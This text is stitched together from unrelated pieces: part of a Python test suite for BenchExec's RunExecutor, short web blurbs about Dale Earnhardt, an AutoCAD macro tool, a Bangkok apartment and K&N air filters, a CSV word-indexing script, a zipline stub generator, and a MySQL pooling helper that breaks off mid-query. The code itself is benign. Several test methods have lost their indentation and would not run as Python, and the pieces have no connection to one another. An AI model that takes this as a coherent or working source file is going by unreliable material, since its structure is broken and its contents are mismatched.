            self.assertAlmostEqual(
                float(result["cputime"].rstrip("s")),
                trivial_run_grace_time,
                delta=trivial_run_grace_time,
                msg='cputime of "/bin/cat < /dev/null" is not approximately zero',
            )
        self.check_result_keys(result, "returnvalue")

        self.check_command_in_output(output, "/bin/cat")
        self.assertEqual(output[-1], "TEST_TOKEN", "run output misses command output")
        for line in output[1:-1]:
            self.assertRegex(line, "^-*$", "unexpected text in run output")
    def test_append_environment_variable(self):
        """Values from 'additionalEnv' must be appended to existing variables."""
        if not os.path.exists("/bin/sh"):
            self.skipTest("missing /bin/sh")
        (_, output) = self.execute_run("/bin/sh", "-c", "echo $PATH")
        path = output[-1]
        (_, output) = self.execute_run(
            "/bin/sh",
            "-c",
            "echo $PATH",
            environments={"additionalEnv": {"PATH": ":TEST_TOKEN"}},
        )
        self.assertEqual(output[-1], path + ":TEST_TOKEN")
def test_new_environment_variable(self):
if not os.path.exists("/bin/sh"):
self.skipTest("missing /bin/sh")
(_, output) = self.execute_run(
"/bin/sh", "-c", "echo $PATH", environments={"newEnv": {"PATH": "/usr/bin"}}
)
self.assertEqual(output[-1], "/usr/bin")
    def test_stop_run(self):
        """Calling stop() from another thread must kill the running process
        with terminationreason 'killed'."""
        if not os.path.exists("/bin/sleep"):
            self.skipTest("missing /bin/sleep")
        # helper thread calls self.runexecutor.stop() after 1s
        thread = _StopRunThread(1, self.runexecutor)
        thread.start()
        (result, output) = self.execute_run(
            "/bin/sleep", "10", expect_terminationreason="killed"
        )
        thread.join()

        self.check_exitcode(result, 9, "exit code of killed process is not 9")
        self.assertAlmostEqual(
            result["walltime"],
            1,
            delta=0.5,
            msg="walltime is not approximately the time after which the process should have been killed",
        )
        if "cputime" in result:  # not present without cpuacct cgroup
            self.assertAlmostEqual(
                result["cputime"],
                trivial_run_grace_time,
                delta=trivial_run_grace_time,
                msg="cputime of /bin/sleep is not approximately zero",
            )

        self.check_command_in_output(output, "/bin/sleep 10")
        for line in output[1:]:
            self.assertRegex(line, "^-*$", "unexpected text in run output")
def test_reduce_file_size_empty_file(self):
with tempfile.NamedTemporaryFile() as tmp:
runexecutor._reduce_file_size_if_necessary(tmp.name, 0)
self.assertEqual(os.path.getsize(tmp.name), 0)
def test_reduce_file_size_empty_file2(self):
with tempfile.NamedTemporaryFile() as tmp:
runexecutor._reduce_file_size_if_necessary(tmp.name, 500)
self.assertEqual(os.path.getsize(tmp.name), 0)
    def test_reduce_file_size_long_line_not_truncated(self):
        """A file consisting of a single long line must not be truncated,
        even if it exceeds the size limit."""
        with tempfile.NamedTemporaryFile(mode="wt") as tmp:
            content = "Long line " * 500
            tmp.write(content)
            tmp.flush()
            runexecutor._reduce_file_size_if_necessary(tmp.name, 500)
            with open(tmp.name, "rt") as tmp2:
                self.assertMultiLineEqual(tmp2.read(), content)
REDUCE_WARNING_MSG = (
"WARNING: YOUR LOGFILE WAS TOO LONG, SOME LINES IN THE MIDDLE WERE REMOVED."
)
REDUCE_OVERHEAD = 100
    def test_reduce_file_size(self):
        """An over-long multi-line file must be truncated in the middle,
        keeping first and last lines and inserting the warning marker."""
        with tempfile.NamedTemporaryFile(mode="wt") as tmp:
            line = "Some text\n"
            tmp.write(line * 500)
            tmp.flush()
            limit = 500
            runexecutor._reduce_file_size_if_necessary(tmp.name, limit)
            self.assertLessEqual(
                os.path.getsize(tmp.name), limit + self.REDUCE_OVERHEAD
            )
            with open(tmp.name, "rt") as tmp2:
                new_content = tmp2.read()
        self.assertIn(self.REDUCE_WARNING_MSG, new_content)
        self.assertTrue(new_content.startswith(line))
        self.assertTrue(new_content.endswith(line))
    def test_reduce_file_size_limit_zero(self):
        """With limit 0 the file must shrink to (at most) the overhead and
        still begin with the original first line plus the warning marker."""
        with tempfile.NamedTemporaryFile(mode="wt") as tmp:
            line = "Some text\n"
            tmp.write(line * 500)
            tmp.flush()
            runexecutor._reduce_file_size_if_necessary(tmp.name, 0)
            self.assertLessEqual(os.path.getsize(tmp.name), self.REDUCE_OVERHEAD)
            with open(tmp.name, "rt") as tmp2:
                new_content = tmp2.read()
        self.assertIn(self.REDUCE_WARNING_MSG, new_content)
        self.assertTrue(new_content.startswith(line))
    def test_append_crash_dump_info(self):
        """When the tool reports a JVM-style crash-dump file ("hs_err_pid...")
        and exits non-zero, the dump's content must be appended to the log."""
        if not os.path.exists("/bin/sh"):
            self.skipTest("missing /bin/sh")
        (result, output) = self.execute_run(
            "/bin/sh",
            "-c",
            'echo "# An error report file with more information is saved as:";'
            'echo "# $(pwd)/hs_err_pid_1234.txt";'
            "echo TEST_TOKEN > hs_err_pid_1234.txt;"
            "exit 2",
        )
        self.assertEqual(
            output[-1], "TEST_TOKEN", "log file misses content from crash dump file"
        )
    def test_integration(self):
        """Smoke test of the external runexec command-line tool."""
        if not os.path.exists("/bin/echo"):
            self.skipTest("missing /bin/echo")
        (result, output) = self.execute_run_extern("/bin/echo", "TEST_TOKEN")
        self.check_exitcode_extern(result, 0, "exit code of /bin/echo is not zero")
        self.check_result_keys(result, "returnvalue")

        self.check_command_in_output(output, "/bin/echo TEST_TOKEN")
        self.assertEqual(output[-1], "TEST_TOKEN", "run output misses command output")
        for line in output[1:-1]:
            self.assertRegex(line, "^-*$", "unexpected text in run output")
    def test_home_and_tmp_is_separate(self):
        """HOME and TMPDIR must point into fresh per-run temp directories."""
        if not os.path.exists("/bin/sh"):
            self.skipTest("missing /bin/sh")
        (result, output) = self.execute_run("/bin/sh", "-c", "echo $HOME $TMPDIR")
        self.check_exitcode(result, 0, "exit code of /bin/sh is not zero")
        self.assertRegex(
            output[-1],
            "/BenchExec_run_[^/]*/home .*/BenchExec_run_[^/]*/tmp",
            "HOME or TMPDIR variable does not contain expected temporary directory",
        )
    def test_temp_dirs_are_removed(self):
        """The per-run HOME and TMPDIR directories must be deleted afterwards."""
        if not os.path.exists("/bin/sh"):
            self.skipTest("missing /bin/sh")
        (result, output) = self.execute_run("/bin/sh", "-c", "echo $HOME $TMPDIR")
        self.check_exitcode(result, 0, "exit code of /bin/sh is not zero")
        home_dir = output[-1].split(" ")[0]
        temp_dir = output[-1].split(" ")[1]
        self.assertFalse(
            os.path.exists(home_dir),
            f"temporary home directory {home_dir} was not cleaned up",
        )
        self.assertFalse(
            os.path.exists(temp_dir),
            f"temporary temp directory {temp_dir} was not cleaned up",
        )
    def test_home_is_writable(self):
        """The per-run HOME directory must be writable by the tool."""
        if not os.path.exists("/bin/sh"):
            self.skipTest("missing /bin/sh")
        (result, output) = self.execute_run("/bin/sh", "-c", "touch $HOME/TEST_FILE")
        self.check_exitcode(
            result,
            0,
            f"Failed to write to $HOME/TEST_FILE, output was\n{output}",
        )
    def test_no_cleanup_temp(self):
        """With cleanup_temp_dir=False the per-run temp directory and its
        content must survive the run (the test removes it itself)."""
        if not os.path.exists("/bin/sh"):
            self.skipTest("missing /bin/sh")
        self.setUp(cleanup_temp_dir=False)  # create RunExecutor with desired parameter
        (result, output) = self.execute_run(
            "/bin/sh", "-c", 'echo "$TMPDIR"; echo "" > "$TMPDIR/test"'
        )
        self.check_exitcode(result, 0, "exit code of /bin/sh is not zero")
        temp_dir = output[-1]
        test_file = os.path.join(temp_dir, "test")
        # file written by the run must still exist
        subprocess.run(["test", "-f", test_file], check=True)
        self.assertEqual(
            "tmp", os.path.basename(temp_dir), "unexpected name of temp dir"
        )
        self.assertNotEqual(
            "/tmp", temp_dir, "temp dir should not be the global temp dir"
        )
        # clean up manually since the executor was told not to
        subprocess.run(["rm", "-r", os.path.dirname(temp_dir)], check=True)
    def test_require_cgroup_invalid(self):
        """Requesting an unknown cgroup subsystem must abort with an error."""
        with self.assertLogs(level=logging.ERROR) as log:
            with self.assertRaises(SystemExit):
                RunExecutor(additional_cgroup_subsystems=["invalid"])

        self.assertIn(
            'Cgroup subsystem "invalid" was required but is not available',
            "\n".join(log.output),
        )
    def test_require_cgroup_cpu(self):
        """With the cpu subsystem required, the tool must run inside a
        benchmark_* cgroup of that subsystem (read from /proc/self/cgroup)."""
        try:
            self.setUp(additional_cgroup_subsystems=["cpu"])
        except SystemExit as e:
            self.skipTest(e)
        if not os.path.exists("/bin/cat"):
            self.skipTest("missing /bin/cat")
        (result, output) = self.execute_run("/bin/cat", "/proc/self/cgroup")
        self.check_exitcode(result, 0, "exit code of /bin/cat is not zero")
        for line in output:
            if re.match(r"^[0-9]*:([^:]*,)?cpu(,[^:]*)?:/(.*/)?benchmark_.*$", line):
                return  # Success
        self.fail("Not in expected cgroup for subsystem cpu:\n" + "\n".join(output))
    def test_set_cgroup_cpu_shares(self):
        """Passing cgroupValues must not break execution."""
        if not os.path.exists("/bin/echo"):
            self.skipTest("missing /bin/echo")
        try:
            self.setUp(additional_cgroup_subsystems=["cpu"])
        except SystemExit as e:
            # cpu subsystem not available on this machine
            self.skipTest(e)
        (result, _) = self.execute_run(
            "/bin/echo", cgroupValues={("cpu", "shares"): 42}
        )
        self.check_exitcode(result, 0, "exit code of /bin/echo is not zero")
        # Just assert that execution was successful,
        # testing that the value was actually set is much more difficult.
    def test_nested_runexec(self):
        """runexec must be able to execute another runexec inside its own run."""
        if not os.path.exists("/bin/echo"):
            self.skipTest("missing /bin/echo")
        self.setUp(
            dir_modes={
                # Do not mark /home hidden, would fail with python from virtualenv
                "/": containerexecutor.DIR_READ_ONLY,
                "/tmp": containerexecutor.DIR_FULL_ACCESS,  # for inner_output_file
                "/sys/fs/cgroup": containerexecutor.DIR_FULL_ACCESS,
            }
        )
        inner_args = ["--", "/bin/echo", "TEST_TOKEN"]
        with tempfile.NamedTemporaryFile(
            mode="r", prefix="inner_output_", suffix=".log"
        ) as inner_output_file:
            inner_cmdline = self.get_runexec_cmdline(
                *inner_args, output_filename=inner_output_file.name
            )
            outer_result, outer_output = self.execute_run(*inner_cmdline)
            # Read the inner run's log before the temporary file is deleted.
            inner_output = inner_output_file.read().strip().splitlines()
        logging.info("Outer output:\n%s", "\n".join(outer_output))
        logging.info("Inner output:\n%s", "\n".join(inner_output))
        self.check_result_keys(outer_result, "returnvalue")
        self.check_exitcode(outer_result, 0, "exit code of inner runexec is not zero")
        self.check_command_in_output(inner_output, "/bin/echo TEST_TOKEN")
        self.assertEqual(
            inner_output[-1], "TEST_TOKEN", "run output misses command output"
        )
def test_starttime(self):
if not os.path.exists("/bin/echo"):
self.skipTest("missing /bin/echo")
before = util.read_local_time()
(result, _) = self.execute_run("/bin/echo")
after = util.read_local_time()
self.check_result_keys(result)
run_starttime = result["starttime"]
self.assertIsNotNone(run_starttime.tzinfo, "start time is not a local time")
self.assertLessEqual(before, run_starttime)
self.assertLessEqual(run_starttime, after)
class TestRunExecutorWithContainer(TestRunExecutor):
    """Re-runs the TestRunExecutor suite with container mode (namespaces) enabled,
    plus container-specific tests for result-file retrieval and file limits."""
    def setUp(self, *args, **kwargs):
        # Skip the whole test if user namespaces are not usable on this kernel.
        try:
            container.execute_in_namespace(lambda: 0)
        except OSError as e:
            self.skipTest(f"Namespaces not supported: {os.strerror(e.errno)}")
        # Default directory modes: read-only root, hidden /home and /tmp;
        # individual tests may override via the dir_modes keyword.
        dir_modes = kwargs.pop(
            "dir_modes",
            {
                "/": containerexecutor.DIR_READ_ONLY,
                "/home": containerexecutor.DIR_HIDDEN,
                "/tmp": containerexecutor.DIR_HIDDEN,
            },
        )
        self.runexecutor = RunExecutor(
            use_namespaces=True, dir_modes=dir_modes, *args, **kwargs
        )
    def get_runexec_cmdline(self, *args, **kwargs):
        # Command line for a nested runexec in container mode, mirroring the
        # directory modes used in setUp().
        return [
            "python3",
            runexec,
            "--container",
            "--read-only-dir",
            "/",
            "--hidden-dir",
            "/home",
            "--hidden-dir",
            "/tmp",
            "--dir",
            "/tmp",
            "--output",
            kwargs["output_filename"],
        ] + list(args)
    def execute_run(self, *args, **kwargs):
        # /tmp is hidden (i.e., fresh) in the container, so use it as working dir.
        return super(TestRunExecutorWithContainer, self).execute_run(
            workingDir="/tmp", *args, **kwargs
        )
    def test_home_and_tmp_is_separate(self):
        self.skipTest("not relevant in container")
    def test_temp_dirs_are_removed(self):
        self.skipTest("not relevant in container")
    def test_no_cleanup_temp(self):
        self.skipTest("not relevant in container")
    def check_result_files(
        self, shell_cmd, result_files_patterns, expected_result_files
    ):
        """Run shell_cmd in the container and assert that exactly
        expected_result_files end up in the output directory according to
        result_files_patterns."""
        output_dir = tempfile.mkdtemp("", "output_")
        try:
            result, output = self.execute_run(
                "/bin/sh",
                "-c",
                shell_cmd,
                output_dir=output_dir,
                result_files_patterns=result_files_patterns,
            )
            output_str = "\n".join(output)
            # NOTE(review): shell_cmd is a string, so ' '.join(shell_cmd) spaces
            # out its characters in this failure message -- confirm intended.
            self.assertEqual(
                result["exitcode"].value,
                0,
                f"exit code of {' '.join(shell_cmd)} is not zero,\n"
                f"result was {result!r},\noutput was\n{output_str}",
            )
            # Collect every retrieved file, relative to output_dir.
            result_files = []
            for root, _unused_dirs, files in os.walk(output_dir):
                for file in files:
                    result_files.append(
                        os.path.relpath(os.path.join(root, file), output_dir)
                    )
            expected_result_files.sort()
            result_files.sort()
            self.assertListEqual(
                result_files,
                expected_result_files,
                f"\nList of retrieved result files differs from expected list,\n"
                f"result was {result!r},\noutput was\n{output_str}",
            )
        finally:
            shutil.rmtree(output_dir, ignore_errors=True)
    def test_result_file_simple(self):
        self.check_result_files("echo TEST_TOKEN > TEST_FILE", ["."], ["TEST_FILE"])
    def test_result_file_recursive(self):
        self.check_result_files(
            "mkdir TEST_DIR; echo TEST_TOKEN > TEST_DIR/TEST_FILE",
            ["."],
            ["TEST_DIR/TEST_FILE"],
        )
    def test_result_file_multiple(self):
        self.check_result_files(
            "echo TEST_TOKEN > TEST_FILE; echo TEST_TOKEN > TEST_FILE2",
            ["."],
            ["TEST_FILE", "TEST_FILE2"],
        )
    def test_result_file_symlink(self):
        # Symlinks are not retrieved as result files.
        self.check_result_files(
            "echo TEST_TOKEN > TEST_FILE; ln -s TEST_FILE TEST_LINK",
            ["."],
            ["TEST_FILE"],
        )
    def test_result_file_no_match(self):
        self.check_result_files("echo TEST_TOKEN > TEST_FILE", ["NO_MATCH"], [])
    def test_result_file_no_pattern(self):
        self.check_result_files("echo TEST_TOKEN > TEST_FILE", [], [])
    def test_result_file_empty_pattern(self):
        # An empty pattern string is invalid.
        self.assertRaises(
            ValueError,
            lambda: self.check_result_files("echo TEST_TOKEN > TEST_FILE", [""], []),
        )
    def test_result_file_partial_match(self):
        self.check_result_files(
            "echo TEST_TOKEN > TEST_FILE; mkdir TEST_DIR; echo TEST_TOKEN > TEST_DIR/TEST_FILE",
            ["TEST_DIR"],
            ["TEST_DIR/TEST_FILE"],
        )
    def test_result_file_multiple_patterns(self):
        self.check_result_files(
            "echo TEST_TOKEN > TEST_FILE; "
            "echo TEST_TOKEN > TEST_FILE2; "
            "mkdir TEST_DIR; "
            "echo TEST_TOKEN > TEST_DIR/TEST_FILE; ",
            ["TEST_FILE", "TEST_DIR/TEST_FILE"],
            ["TEST_FILE", "TEST_DIR/TEST_FILE"],
        )
    def test_result_file_wildcard(self):
        self.check_result_files(
            "echo TEST_TOKEN > TEST_FILE; "
            "echo TEST_TOKEN > TEST_FILE2; "
            "echo TEST_TOKEN > TEST_NOFILE; ",
            ["TEST_FILE*"],
            ["TEST_FILE", "TEST_FILE2"],
        )
    def test_result_file_absolute_pattern(self):
        # Absolute patterns are interpreted relative to the container root,
        # so retrieved paths keep their full directory structure.
        self.check_result_files("echo TEST_TOKEN > TEST_FILE", ["/"], ["tmp/TEST_FILE"])
    def test_result_file_absolute_and_pattern(self):
        self.check_result_files(
            "echo TEST_TOKEN > TEST_FILE; mkdir TEST_DIR; echo TEST_TOKEN > TEST_DIR/TEST_FILE",
            ["TEST_FILE", "/tmp/TEST_DIR"],
            ["tmp/TEST_FILE", "tmp/TEST_DIR/TEST_FILE"],
        )
    def test_result_file_relative_traversal(self):
        # ".." is allowed as long as the pattern stays inside the working dir.
        self.check_result_files(
            "echo TEST_TOKEN > TEST_FILE", ["foo/../TEST_FILE"], ["TEST_FILE"]
        )
    def test_result_file_illegal_relative_traversal(self):
        # Escaping the working directory via ".." must be rejected.
        self.assertRaises(
            ValueError,
            lambda: self.check_result_files(
                "echo TEST_TOKEN > TEST_FILE", ["foo/../../bar"], []
            ),
        )
    def test_result_file_recursive_pattern(self):
        self.check_result_files(
            "mkdir -p TEST_DIR/TEST_DIR; "
            "echo TEST_TOKEN > TEST_FILE.txt; "
            "echo TEST_TOKEN > TEST_DIR/TEST_FILE.txt; "
            "echo TEST_TOKEN > TEST_DIR/TEST_DIR/TEST_FILE.txt; ",
            ["**/*.txt"],
            [
                "TEST_FILE.txt",
                "TEST_DIR/TEST_FILE.txt",
                "TEST_DIR/TEST_DIR/TEST_FILE.txt",
            ],
        )
    def test_file_count_limit(self):
        """Exceeding files_count_limit must terminate the run."""
        if not os.path.exists("/bin/sh"):
            self.skipTest("missing /bin/sh")
        self.setUp(container_tmpfs=False)  # create RunExecutor with desired parameter
        # Speed up the limit check for the test.
        filehierarchylimit._CHECK_INTERVAL_SECONDS = 0.1
        (result, output) = self.execute_run(
            "/bin/sh",
            "-c",
            "for i in $(seq 1 10000); do touch $i; done",
            files_count_limit=100,
            result_files_patterns=None,
            expect_terminationreason="files-count",
        )
        # NOTE(review): the message mentions 15 but the expected code is 9 --
        # confirm which signal the process is killed with.
        self.check_exitcode(result, 9, "exit code of killed process is not 15")
        for line in output[1:]:
            self.assertRegex(line, "^-*$", "unexpected text in run output")
    def test_file_size_limit(self):
        """Exceeding files_size_limit must terminate the run."""
        if not os.path.exists("/bin/sh"):
            self.skipTest("missing /bin/sh")
        self.setUp(container_tmpfs=False)  # create RunExecutor with desired parameter
        # Speed up the limit check for the test.
        filehierarchylimit._CHECK_INTERVAL_SECONDS = 0.1
        (result, output) = self.execute_run(
            "/bin/sh",
            "-c",
            "for i in $(seq 1 100000); do echo $i >> TEST_FILE; done",
            files_size_limit=100,
            result_files_patterns=None,
            expect_terminationreason="files-size",
        )
        # NOTE(review): the message mentions 15 but the expected code is 9 --
        # confirm which signal the process is killed with.
        self.check_exitcode(result, 9, "exit code of killed process is not 15")
        for line in output[1:]:
            self.assertRegex(line, "^-*$", "unexpected text in run output")
    def test_path_with_space(self):
        """Full-access directories whose path contains a space must work."""
        temp_dir = tempfile.mkdtemp(prefix="BenchExec test")
        try:
            # create RunExecutor with desired parameter
            self.setUp(
                dir_modes={
                    "/": containerexecutor.DIR_READ_ONLY,
                    "/home": containerexecutor.DIR_HIDDEN,
                    "/tmp": containerexecutor.DIR_HIDDEN,
                    temp_dir: containerexecutor.DIR_FULL_ACCESS,
                }
            )
            temp_file = os.path.join(temp_dir, "TEST_FILE")
            result, output = self.execute_run(
                "/bin/sh", "-c", f"echo TEST_TOKEN > '{temp_file}'"
            )
            self.check_result_keys(result)
            self.check_exitcode(result, 0, "exit code of process is not 0")
            self.assertTrue(
                os.path.exists(temp_file),
                f"File '{temp_file}' not created, output was:\n" + "\n".join(output),
            )
            with open(temp_file, "r") as f:
                self.assertEqual(f.read().strip(), "TEST_TOKEN")
        finally:
            shutil.rmtree(temp_dir)
    def test_uptime_with_lxcfs(self):
        """With LXCFS available, the container should see its own (small) uptime."""
        if not os.path.exists("/var/lib/lxcfs/proc"):
            self.skipTest("missing lxcfs")
        result, output = self.execute_run("cat", "/proc/uptime")
        self.check_result_keys(result)
        self.check_exitcode(result, 0, "exit code for reading uptime is not zero")
        uptime = float(output[-1].split(" ")[0])
        self.assertLessEqual(
            uptime, 10, f"Uptime {uptime}s unexpectedly high in container"
        )
    def test_uptime_without_lxcfs(self):
        """Without the system-config feature, the host uptime should be visible."""
        if not os.path.exists("/var/lib/lxcfs/proc"):
            self.skipTest("missing lxcfs")
        # create RunExecutor with desired parameter
        self.setUp(container_system_config=False)
        result, output = self.execute_run("cat", "/proc/uptime")
        self.check_result_keys(result)
        self.check_exitcode(result, 0, "exit code for reading uptime is not zero")
        uptime = float(output[-1].split(" ")[0])
        # If uptime was less than 10s, LXCFS probably was in use
        self.assertGreaterEqual(
            uptime, 10, f"Uptime {uptime}s unexpectedly low in container"
        )
class _StopRunThread(threading.Thread):
def __init__(self, delay, runexecutor):
super(_StopRunThread, self).__init__()
self.daemon = True
self.delay = delay
self.runexecutor = runexecutor
def run(self):
time.sleep(self.delay)
self.runexecutor.stop()
class TestRunExecutorUnits(unittest.TestCase):
    """unit tests for parts of RunExecutor"""
    def test_get_debug_output_with_error_report_and_invalid_utf8(self):
        """The error-report file referenced in the output must be appended to the
        output file and deleted, even if both contain invalid UTF-8 bytes."""
        invalid_utf8 = b"\xFF"
        # delete=False: _get_debug_output_after_crash is expected to remove it.
        with tempfile.NamedTemporaryFile(mode="w+b", delete=False) as report_file:
            with tempfile.NamedTemporaryFile(mode="w+b") as output:
                # Output contains the marker line pointing at the report file.
                output_content = f"""Dummy output
# An error report file with more information is saved as:
# {report_file.name}
More output
""".encode()
                report_content = b"Report output\nMore lines"
                output_content += invalid_utf8
                report_content += invalid_utf8
                output.write(output_content)
                output.flush()
                output.seek(0)
                report_file.write(report_content)
                report_file.flush()
                runexecutor._get_debug_output_after_crash(output.name, "")
                # The report file must be consumed (deleted) and its content
                # appended verbatim to the output file.
                self.assertFalse(os.path.exists(report_file.name))
                self.assertEqual(output.read(), output_content + report_content)
|
Smooth up and down scrolling menu.
Dale Earnhardt wins the Daytona 500. Listen as he speaks about his win. Watch his victory spin! In memory of a hero.
AutoPlayer14 is a keyboard macro player for AutoCAD R14. It provides a pause-for-user-input mechanism and an easy-to-use interface.
|
import csv
import sys
#TODO take a schema as input
class WordIndexer:
    """Assigns a stable integer index to each distinct word and appends every
    newly seen word to the index file, one word per line."""

    def __init__(self, indexf):
        self.words = {}
        self.count = 0
        self.indexfw = open(indexf, 'w')

    def add_word(self, w):
        """Return the index of w, registering it (and writing it out) if new."""
        if w not in self.words:
            self.indexfw.write(w + '\n')
            self.words[w] = self.count
            self.count += 1
        return self.words[w]

    def close(self):
        self.indexfw.close()
def indexing(inputf, delim_in):
    """Rewrite inputf as a space-delimited file of integer word indices.

    Creates ``inputf + '.i'`` (the indexed rows) and ``inputf + '.index'``
    (one distinct word per line); returns both paths.
    """
    intfile = inputf + '.i'
    indexf = inputf + '.index'
    wi = WordIndexer(indexf)
    with open(inputf, 'r') as ins, open(intfile, 'w') as outs:
        reader = csv.reader(ins, delimiter=delim_in)
        writer = csv.writer(outs, delimiter=' ')
        for row in reader:
            writer.writerow([wi.add_word(word) for word in row])
    wi.close()
    return intfile, indexf
if __name__ == '__main__':
    # Usage: script inputfile [delim]; delimiter defaults to a single space.
    if len(sys.argv) < 2:
        raise Exception("usage: %s inputfile [delim]" % sys.argv[0])
    delim = sys.argv[2] if len(sys.argv) == 3 else ' '
    indexing(sys.argv[1], delim_in=delim)
|
Large living room and dining room with a panoramic view of Bangkok. The kitchen is fully equipped with quality brand equipment. The unit is fully furnished with specially selected art pieces and furniture from all over the world.
The building has a large salt water swimming pool, playground and garden. 24-hour security, basketball court and gym.
|
import inspect
from operator import attrgetter
from textwrap import dedent
from zipline import api, TradingAlgorithm
def main():
    """Generate a ``.pyi`` type-stub file next to ``zipline.api`` listing every
    TradingAlgorithm API function with its signature and docstring."""
    # api.__file__ may end in '.pyc'; rstrip('c') reduces it to '.py' and the
    # appended 'i' yields the '.pyi' stub path.
    # NOTE(review): rstrip('c') strips *all* trailing 'c' characters -- safe
    # here only because '.py'/'.pyc' end in at most one 'c'.
    with open(api.__file__.rstrip('c') + 'i', 'w') as stub:
        # Imports so that Asset et al can be resolved.
        # "from MOD import *" will re-export the imports from the stub, so
        # explicitly importing.
        stub.write(dedent("""\
        import collections
        from zipline.assets import Asset, Equity, Future
        from zipline.assets.futures import FutureChain
        from zipline.finance.asset_restrictions import Restrictions
        from zipline.finance.cancel_policy import CancelPolicy
        from zipline.pipeline import Pipeline
        from zipline.protocol import Order
        from zipline.utils.events import EventRule
        from zipline.utils.security_list import SecurityList
        """))
        # Sort to generate consistent stub file:
        for api_func in sorted(TradingAlgorithm.all_api_methods(),
                               key=attrgetter('__name__')):
            # NOTE(review): inspect._signature_bound_method is a private API;
            # it drops the leading 'self' from the signature -- confirm it is
            # still available in the targeted Python version.
            sig = inspect._signature_bound_method(inspect.signature(api_func))
            indent = ' ' * 4
            # Emit "def name(sig):" followed by the original docstring.
            stub.write(dedent('''\
                def {func_name}{func_sig}:
                    """'''.format(func_name=api_func.__name__,
                                  func_sig=sig)))
            stub.write(dedent('{indent}{func_doc}'.format(
                func_doc=api_func.__doc__ or '\n',  # handle None docstring
                indent=indent,
            )))
            stub.write('{indent}"""\n\n'.format(indent=indent))
# Allow running this module directly to (re)generate the stub file.
if __name__ == '__main__':
    main()
|
Help your GMC G1500 run better.
Use K&N's application search to find the right air filter for your GMC. Upgrade your GMC G1500 today with a K&N air filter. K&N automotive replacement air filters are a top performance accessory that can help your car or truck run better.
|
import time
import socket
import threading
import pymysql
import pymysql.err
import pymysql.cursors
from scalrpy.util import helper
from scalrpy import LOG
def make_connection(config, autocommit=True):
    """Open a new pymysql connection for *config*.

    *config* is a dict with keys 'user', 'pass', 'name', 'host', 'port' and an
    optional 'timeout' (seconds, default 10).  Rows are returned as dicts.
    """
    conn = pymysql.connect(
        host=config['host'],
        port=config['port'],
        user=config['user'],
        passwd=config['pass'],
        db=config['name'],
        connect_timeout=config.get('timeout', 10),
        cursorclass=pymysql.cursors.DictCursor,
    )
    conn.autocommit(autocommit)
    return conn
def validate_connection(connection):
    """Check whether *connection* is still alive.

    Returns the result of ``connection.ping()`` on success.  On any failure the
    connection is closed (best effort) and False is returned.
    """
    try:
        return connection.ping()
    # Bug fix: the previous bare ``except:`` also swallowed BaseException
    # (KeyboardInterrupt, SystemExit); catch only real errors.
    except Exception:
        try:
            connection.close()
        except Exception:
            pass
        return False
class DB(object):
    """Thread-safe MySQL helper: each thread gets its own connection/cursor
    state (via threading.local) backed by a shared connection pool."""
    def __init__(self, config, pool_size=None):
        # Per-thread storage for connection, cursor, and autocommit flag.
        self._local = threading.local()
        def _make_connection():
            return make_connection(config, autocommit=True)
        def _validate_connection(connection):
            return validate_connection(connection)
        self._connection_pool = helper.Pool(
            _make_connection,
            _validate_connection,
            pool_size if pool_size else config.get('pool_size', 4))
    def autocommit(self, state):
        """Set this thread's autocommit mode; enabling it releases the
        thread's dedicated connection back to the pool."""
        if state and self._connection:
            # NOTE(review): the connection is returned to the pool *before*
            # its cursor is closed -- confirm the pool tolerates this ordering.
            self._connection_pool.put(self._local.connection)
            self._local.cursor.close()
            self._local.cursor = None
            self._local.connection = None
        self._local.autocommit = bool(state)
    @property
    def _connection(self):
        # Lazily initialize the per-thread connection slot to None.
        try:
            return self._local.connection
        except AttributeError:
            self._local.connection = None
            return self._local.connection
    @property
    def _autocommit(self):
        # Autocommit defaults to True for each new thread.
        try:
            return self._local.autocommit
        except AttributeError:
            self._local.autocommit = True
            return self._local.autocommit
    def execute(self, query, retries=0, retry_timeout=10):
        """Execute *query* and return all rows as a tuple of dicts.

        In autocommit mode a pooled connection is borrowed per call and
        returned afterwards; otherwise the thread keeps one connection until
        commit()/rollback().  On OperationalError/InternalError/socket.timeout
        the query is retried up to *retries* times, sleeping *retry_timeout*
        seconds between attempts.
        """
        while True:
            try:
                if self._autocommit or not self._connection:
                    self._local.connection = self._connection_pool.get(timeout=10)
                    self._local.connection.autocommit(self._autocommit)
                self._local.cursor = self._connection.cursor()
                try:
                    start_time = time.time()
                    self._local.cursor.execute(query)
                    end_time = time.time()
                    if end_time - start_time > 1:
                        # Log queries that take longer than one second.
                        LOG.debug('Query too slow: %s\n%s...' %
                                  (end_time - start_time, query[:150]))
                    results = self._local.cursor.fetchall()
                    if results is not None:
                        results = tuple(results)
                    return results
                finally:
                    # In autocommit mode, return the connection immediately.
                    if self._autocommit:
                        self._local.cursor.close()
                        self._connection_pool.put(self._local.connection)
                        self._local.connection = None
                        self._local.cursor = None
            except (pymysql.err.OperationalError, pymysql.err.InternalError, socket.timeout):
                if not retries:
                    raise
                retries -= 1
                time.sleep(retry_timeout)
    def execute_with_limit(self, query, limit, max_limit=None, retries=0, retry_timeout=10):
        """
        :returns: generator
        """
        # Yield chunks of up to `limit` rows (capped overall at `max_limit`)
        # by appending successive LIMIT offset, count clauses to the query.
        if max_limit:
            i, chunk_size = 0, min(limit, max_limit)
        else:
            i, chunk_size = 0, limit
        while True:
            is_last_iter = bool(max_limit) and (i + 1) * chunk_size > max_limit
            if is_last_iter:
                limit_query = query + \
                    " LIMIT %s, %s" % (i * chunk_size, max_limit - i * chunk_size)
            else:
                limit_query = query + " LIMIT %s, %s" % (i * chunk_size, chunk_size)
            results = self.execute(limit_query, retries=retries, retry_timeout=retry_timeout)
            if not results:
                break
            yield results
            if len(results) < limit or is_last_iter:
                break
            i += 1
    def commit(self):
        # Commit the thread's transaction (non-autocommit mode).
        # NOTE(review): the cursor is closed but the connection is neither
        # returned to the pool nor reset here -- confirm callers handle that.
        if self._connection:
            self._local.connection.commit()
            self._local.cursor.close()
    def rollback(self):
        # Roll back the thread's transaction (non-autocommit mode).
        if self._connection:
            self._connection.rollback()
class ScalrDB(DB):
    """DB subclass with helpers that batch-load Scalr settings/properties and
    merge them into the given record dicts in place (existing truthy values in
    a record are never overwritten)."""
    def load_server_properties(self, servers, names):
        """Load the given property *names* for *servers* from server_properties
        and merge them into each server dict in place."""
        names = list(names)
        servers_id = list(set(server['server_id'] for server in servers if server['server_id']))
        if not servers_id:
            return
        query = (
            "SELECT server_id, name, value "
            "FROM server_properties "
            "WHERE name IN ({0}) "
            "AND server_id IN ({1})"
